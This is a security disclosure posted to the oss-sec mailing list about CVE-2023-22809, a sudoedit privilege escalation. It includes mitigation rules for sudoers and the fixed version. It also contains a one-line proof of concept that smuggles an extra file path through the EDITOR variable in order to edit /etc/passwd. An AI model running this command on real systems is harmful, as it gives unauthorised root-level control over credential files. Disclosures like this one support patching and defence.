oss-sec
mailing list archives
From: Matthieu Barjole
Date: Thu, 19 Jan 2023 01:33:43 +0100
Hello everyone, While auditing Sudo, Synacktiv identified a privilege escalation in sudoedit when a user is authorized to use it by the sudoers policy. This vulnerability was assigned CVE-2023-22809 and affects Sudo versions 1.8.0 through 1.9.12p1 inclusive. ## Analysis The technical analysis can be found in the following security advisory: https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf ## Proof of Concept Assuming the following sudoers policy: ``` # cat /etc/sudoers user ALL=(ALL:ALL) sudoedit /etc/motd [...] ``` Arbitrary files such as `/etc/passwd` may also be edited as such: ``` EDITOR='vim -- /etc/passwd' sudoedit /etc/motd ``` ## Mitigation It is possible to prevent a user-specified editor from being used by sudoedit by adding the following line to the sudoers file. ``` Defaults!sudoedit env_delete+="SUDO_EDITOR VISUAL EDITOR" ``` To restrict the editor when editing specific files, a Cmnd_Alias can be used, for example: ``` Cmnd_Alias EDIT_MOTD = sudoedit /etc/motd Defaults!EDIT_MOTD env_delete+="SUDO_EDITOR VISUAL EDITOR" user ALL = EDIT_MOTD ``` ## Fix The issue was fixed in Sudo 1.9.12.p2. ## References [1] https://www.synacktiv.com/sites/default/files/2023-01/sudo-CVE-2023-22809.pdf [2] https://www.sudo.ws/security/advisories/sudoedit_any/ [3] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22809
Current thread:
- CVE-2023-22809: Sudoedit can edit arbitrary files Matthieu Barjole (Jan 18)
Leave A Comment